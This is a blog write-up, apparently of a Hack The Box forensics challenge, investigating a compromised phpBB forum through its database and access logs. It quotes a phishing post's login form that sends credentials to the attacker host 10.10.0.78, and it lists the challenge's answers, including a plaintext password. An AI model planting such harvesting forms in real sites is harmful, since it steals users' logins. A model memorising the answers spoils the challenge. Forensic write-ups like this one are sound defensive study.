Bumblebee

3 minute read
2026-02-26
Log Parsing Log Ingestion GoAccess
Challenge HTB Sherlock Easy

Mostly just jotting down notes with this one.

SOLUTION

Looked through database; found the phpbb_posts table

![](found malicious post.png)

It’s post_id is 9. The user that submitted it is apoole1

Take the value of that post_text field and paste it into an HTML template file. Open it in a browser and see it’s a credential harvester

![](malicious post.png)

Note that it probably would have rendered normally on the target’s computer.

The post was just some malicious HTML. It pretends your session is expired, prompts for login, then shows you the “real” post after submitting the form.

Here’s how the source code of that login widget works:

<form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username"
    target="hiddenframe">
    <div class="panel">
        ...
    </div>
</form>

It bounces the submission off of the attacker’s site: http://10.10.0.78/update.php. The attacker may have used multiple IPs, but now this 10.10.0.78 is at the top of our “Most Wanted” list.

We grep 10.10.0.87 access.log to see when that malicious post was made:

10.10.0.78 - - [25/Apr/2023:13:17:22 +0100] "POST /posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5 HTTP/1.1" 302 294 "http://10.10.0.27/posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"

Here we can see the authentication of when that user logged in to the admin panel:

![authentication as admin](authentication as admin.png)

Note the request where their session ID changes:

![session id change](session id change.png)

It all went down at 2023-04-26 11:53:12 +0100. In UTC, that’s 26/04/2023 10:53:12

We can also see them downloading some backup:

![](downloading backup.png)

HTB asks us about an LDAP password. I havent seen any, so I search the DB:

![search db full text](search db full text.png)

Results indicate it’s in the phpbb_config` table

![](plaintext password.png)

There it is: Passw0rd1.

HTB also asks for the UA of the admin user. Just grep for it and exclude entries with the malicious IP:

grep 'GET /adm/index.php' access.log | grep -v 10.10.0.78

It’s Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

![](apoole1 sets self to admin.png)

date -d @1682506431 -u
# Wed 26 Apr 2023 10:53:51 AM UTC

For the last flag, just grep for download and look for the file that doesnt fit:

10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"

Although in all honesty I found it first in GoAccess:

![](GoAccess downloading backup.png)

Using GoAccess

It’s super easy. Just use docker or podman:

podman run --rm -v ./access.log:/var/log/access.log -v .:/output allinurl/goaccess /var/log/access.log --log-format=COMBINED -o /output/report.html

Map the access.log to the correct file, run the above, then read the output file

firefox report.html

It’ll load up this nifty dashboard - functionality is limited but it’s a great companion to grep

![Dashboard](GoAccess dashboard.png)

Thanks for reading

๐Ÿค๐Ÿค๐Ÿค๐Ÿค
@4wayhandshake